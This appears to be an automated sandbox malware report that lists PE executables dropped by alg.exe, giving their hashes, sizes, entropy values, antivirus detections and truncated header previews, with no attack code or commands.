                                                                                                                                                                                                    SSDEEP:24576:wx71iBLZ05jNTmJWExvsqjnhMgeiCl7G0nehbGZpbD:wxhiHIjNgTDmg27RnWGj
                                                                                                                                                                                                    MD5:CFAAD4CB02866305EB51C9C6445F8CB8
                                                                                                                                                                                                    SHA1:ECAD778D6D1ED4EA8DFD8E3D732AD4F2BEDCD4D9
                                                                                                                                                                                                    SHA-256:5D021A1981EF586DBC9C6D47065736E49FA00DD21ED5256919477B8F5BAA9D10
                                                                                                                                                                                                    SHA-512:18AE465A0BED40CB43A873319EAA489F299024BA549DDC3D7CD1FDA6463C57A8B0568FE24A8414314365DF4033C0E42E6019F0A83697BD24BD5F4A7837817729
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................P..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.0328895845278785
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:J3rSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:95C044F7DB676E235DE57209B3E81944
                                                                                                                                                                                                    SHA1:FB50B710C885F87C4C234CDED10B744F74965EFB
                                                                                                                                                                                                    SHA-256:5CAD62F154120D88A89DA457431F1E1D6738F0FC5B472AF2DE991E7562245F29
                                                                                                                                                                                                    SHA-512:4361C9A50E9DC41BEC743F9C39584135AC7B5474F5510B4A98099C36D2D9966F7BE177CCB0C7118CF32F30693007E28D78C37BC3D9CF54CD6F89F52A9E82E0D7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1242112
                                                                                                                                                                                                    Entropy (8bit):5.172674703455928
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:AYdP/5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FdP/5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:0C535E9F6158B6ED91644BE24CD129E2
                                                                                                                                                                                                    SHA1:7342B8A02829D6629BE0C38FB3FE41F2DD965940
                                                                                                                                                                                                    SHA-256:094245CEF2F4107CB067928BCA7A77018553CD176FA71B0BE828F8B1FBE2704E
                                                                                                                                                                                                    SHA-512:72671909F6690E12DDA8E0DC86CDA9C265D3C26EE3F11CEED6167E99D354B6E79D100DAF0B151E3383F92631BBD5494129FE7E8F77B66115971E8A3195CC347B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......;W..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032914662449468
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:oy5qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:V8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:8EA37942AA63DE24BC7F81CB99E3F57F
                                                                                                                                                                                                    SHA1:E9B59A774AF69B778CFE659C18FD96F013046F19
                                                                                                                                                                                                    SHA-256:64C26A7B946E6E379ACD2DDB9768DFB5FBA6CADC88B9D6D7AB73A9A147FAA0A9
                                                                                                                                                                                                    SHA-512:46BB5F86A01E16FEBA2EB833E2052C9883A51D90A7641B4B85B8359AB17FDFA943694A2748BA0EA610506D242E3011519A44D9E5579A45F3D4DA00742D67CAE4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................W.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032981483190116
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:OKlCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:557BF22035F49C0CBDA8A06E102ED283
                                                                                                                                                                                                    SHA1:DD520B7A6809B505EDECCDDE1F45F0269BA21CD0
                                                                                                                                                                                                    SHA-256:508AA1EC0111F88A3C166AEAD806FACDD2714EFA266C08EADBF9CB3FDECC52F6
                                                                                                                                                                                                    SHA-512:803C06100022E897E5283F66C650F269DDF5F9304A8B854916EA2B4391C27EA32FBE7C38E3412D9AE31C1F1F70B8B0B2653F647803DFBAB91926C2C5848728C0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................t........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032981248138757
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:YilCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:4F09B28D2632A5A8020594785BFFB40A
                                                                                                                                                                                                    SHA1:8B4080F9D5C3612678B2E2A89D9F1A976A235CE0
                                                                                                                                                                                                    SHA-256:7E996A49B9D7144A8A567531D167C225F7F8727800D840BCA43280EB6812460B
                                                                                                                                                                                                    SHA-512:ECD4FF3E5EC125CEE006F6FA003A0D73684AF38F79F7D211815036062160DEDBFE0D9832160F0E8F42EB380218D8D7F4914EFE0D05DA14AEB0405FDF4ADFCFB6
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................*........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032947516110992
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:HTmiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:znsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:FA3CCE747C8D839953CF69FE05F4B005
                                                                                                                                                                                                    SHA1:80E460EE70AA58375751A4496920CFDBCE5A5FA5
                                                                                                                                                                                                    SHA-256:E4AD81B4F0826E957BD86668548A573F735A6B5697DF920C21BE38BB3921D619
                                                                                                                                                                                                    SHA-512:6E138070FFD28A4A2E8D099740CD3AB764E505C96BABA157F349F9DDE192ACC9F02C74620FAA2F1B86C3A7605B78E19E9BA420BA75A867D1D5B5B1273404B705
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................W........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.033866875939195
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:vameXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yLsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:DE37C176279E268C44BCF22D54F3534B
                                                                                                                                                                                                    SHA1:D4A18F0EAB09631F13C80743EAFC68F783D7C582
                                                                                                                                                                                                    SHA-256:C7736BF548089EF91AAF99D697291A6790E92AD7F05EC3AA70359B6562BF8887
                                                                                                                                                                                                    SHA-512:254F1897EB8BF8D327F50A59F2DEFDEE504018346DD14AA17EAD82420F31E16CCF09AFC40F38FF84E909D8798971412B579623298B1434278C15EA374BA9DEC1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................mw......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032935879352042
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:lQ5qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:14E2F91551EB64562E03A3B0D8093170
                                                                                                                                                                                                    SHA1:861E6864EA3673A107F095B3E00359991AE3DF01
                                                                                                                                                                                                    SHA-256:692E51332CCCA2EA65E309D3DB1D449EA217300AFA5DD805178313F813A8849E
                                                                                                                                                                                                    SHA-512:5FF2D21D265D0464EAEF6A9134BF66090D5A42774A9A786A3BB7E891A7E4CA20E08092CAA8E6C94F04BA83FB49BEDF95E0F7EAC9D67A8F565A3FF4354ECD5191
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032970908479915
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:aV/CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:66FC7D5C71F045F7EA4690C51DFB66F0
                                                                                                                                                                                                    SHA1:5FF583E522A5142D62B29EA4FAED9D6D77B9D1D4
                                                                                                                                                                                                    SHA-256:3D0669D0584D28F4F45466A4448BD09EC78C5CE6BA5E40066BF91957589E49CC
                                                                                                                                                                                                    SHA-512:B9661FC5D6F010B5AD56653E3FEB1012F5D269C77D03F1E0F56A54DB15B86BA69F34882B2FE11CCC5A2D8507190692540B3CA6A04677128B760341E6F4B4CA94
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................*.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032867793483503
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:WZmyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:unsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:A035A2FE6C2BE785F66352F49149980A
                                                                                                                                                                                                    SHA1:8100375E606C67D9A9AED5BD76516D6E83493AF8
                                                                                                                                                                                                    SHA-256:26BCD9269C3740F5FB2B92AF6CDF1CB7C6F143EEDA751BFF2640D9127084FE66
                                                                                                                                                                                                    SHA-512:5FCD688FF652EE8357A71951B97BA980A0D2DE062411D89E0C0524D0879473D943EFAC01290D91CF35B5C4395CEDAEC8F7F114D8265A4C101D4676EF4489334C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032925085378454
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:EeSKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:744C83D00ABDE2B069637A7A540B32F8
                                                                                                                                                                                                    SHA1:E1EFAF82EB138A297ADADC529CCC140CC56C28B4
                                                                                                                                                                                                    SHA-256:11BF59F418E6D5BE9BEDEBE599C4720481FE12E2C3F5A3F722FB89E734413B0E
                                                                                                                                                                                                    SHA-512:8067CDFF51EF867C62399C8868F4A372BE6AA16ABB976FF5ADF6CF96645D5334058F448A3AF42B6BFB228DA0C3AC1C631CF14FDBB584D1B527F44281C1B1F781
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................4........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032988143512348
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:o5/CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:E6117D0C06EB1EC88BBD6BADA25DE2F6
                                                                                                                                                                                                    SHA1:2F0D46B733B8A608FF8F780FBAC601A1D8D6739A
                                                                                                                                                                                                    SHA-256:6D4F3ED1068F834F5B974D54A77B2A5817EF82455664689AED4F99A4B2B75F0A
                                                                                                                                                                                                    SHA-512:9630B0A5CD4F2882A6EDC81A362E1D5CFD15313B2A8DAEA79352049D3FA38EBD9A752FDA0D8849993048F2BCE5E1731564DDF6A296E0D3AD00E8CEEBC4526E92
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................'........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1202688
                                                                                                                                                                                                    Entropy (8bit):5.098057501938408
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:n7EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:n7EsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:9992BF3935B21F8910313E55834EF6ED
                                                                                                                                                                                                    SHA1:9E26BD63E028448EAB39BBF1915467702644D3D7
                                                                                                                                                                                                    SHA-256:36462E72E73C681F4C2D2FB0A6CCD2524033F2FB9163064045ED1B506EB9A24D
                                                                                                                                                                                                    SHA-512:AD794AB4030FA5481749C5FD07248B76206C18829EDF2B7A0E4D1AEE3A875BE71DC75623F21D585C82CDDB03065072047376B086033321B1F2B319153A65838F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142784
                                                                                                                                                                                                    Entropy (8bit):5.032320595948362
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:ZKQuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:62C0B799415B8006BD52F5BE6BBB31FC
                                                                                                                                                                                                    SHA1:C2D666DCB9EA28DB0A7B78E5C28DF9F7F4658468
                                                                                                                                                                                                    SHA-256:320A60C99092C54533C7CD12644A896F558BE8C48270B215DCBBA0239BADAF3B
                                                                                                                                                                                                    SHA-512:22D0A26DF7E78FBC6AE5B87161585390DB27F81A8676303295966488324E721CA5642A2AD138E4A1B26EB98822F11E93964ADAC7C88F8DA0A11049D7BE40A1D8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................6.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1298944
                                                                                                                                                                                                    Entropy (8bit):5.249100590226528
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:wi7l/3roAosqjnhMgeiCl7G0nehbGZpbD:Tl/roAUDmg27RnWGj
                                                                                                                                                                                                    MD5:1888065716D98F6D931DCE78B6ECB704
                                                                                                                                                                                                    SHA1:CAE9969A2E9627C4E8A23EC4EAA5D861AFACC8A8
                                                                                                                                                                                                    SHA-256:4E0D6F11E08AE068AA3ED45261F2B6606FCCC524D794286248672876C5D248F0
                                                                                                                                                                                                    SHA-512:60DE67523CFBB2396D5DF694F793C2BF698ECF1B5168BEBBA18AED2091E47F053D944C97F9FC58E1B1EAC2A6C88F3A0F560B542A00D1C57AD63FCF7BE922D27D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1269248
                                                                                                                                                                                                    Entropy (8bit):5.286878226367639
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:G5bfQnyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GNfQnysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:30DDCED92F956D29AC3D37E6DDF4CB21
                                                                                                                                                                                                    SHA1:C8BDD03724751CDAF50E51A94FAE14E21D4075EF
                                                                                                                                                                                                    SHA-256:C98CF8255F480CF3E79C63B0A197C3873EB6F3F91E84F245BDD6814E747D029F
                                                                                                                                                                                                    SHA-512:CA33AB66864DF5DFB0CB62778EC767AD81CE4EFDB2413326F786EB9F012F50C135836AF47E6D91B7EF00DF9F86C531D5C86635F06B9EF0559E30E89841B3CC94
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                                                    Entropy (8bit):5.3033473285938495
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:DNmt0LDILi21JXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:eLiesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:34FFB9EB3428B9F112DDC0543B6262FB
                                                                                                                                                                                                    SHA1:91BA52F8A35B34B90811F1E9F339FC351166909F
                                                                                                                                                                                                    SHA-256:8F6964981B5897716A15BB89F1D3117F3147B3FD3A5A925D5B33AD6573CE8B78
                                                                                                                                                                                                    SHA-512:974190308DFBE45A821BF7262F0E0E80F77D6C1C8BED938418E22FAD3C36C9289F2E3553F747DA7697F419EBBED6CBCE60107116045004E5351AF64F58CE01CC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                                                    Entropy (8bit):5.303335544215182
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:LNmt0LDILi21JXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:2LiesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:68DDA5DE9BC4574746E258D06CEF4F31
                                                                                                                                                                                                    SHA1:2B7652507B13438F57067D95843F3F6013DD88C1
                                                                                                                                                                                                    SHA-256:5E7D93F6BC7FAF31AAE13C7424E0F05EA181AC8AF788BA5ABC6E58CB0CCA502C
                                                                                                                                                                                                    SHA-512:8E593268EDEB3E590DD82DF018F6702F4BE3BE8C86F96C4261031FC6E7A0C85986A2025F26BCB4CEE543DEDA4DB22932B90A0D2B2C7CF4413B26AA7DF0F900B8
                                                                                                                                                                                                    Malicious:true
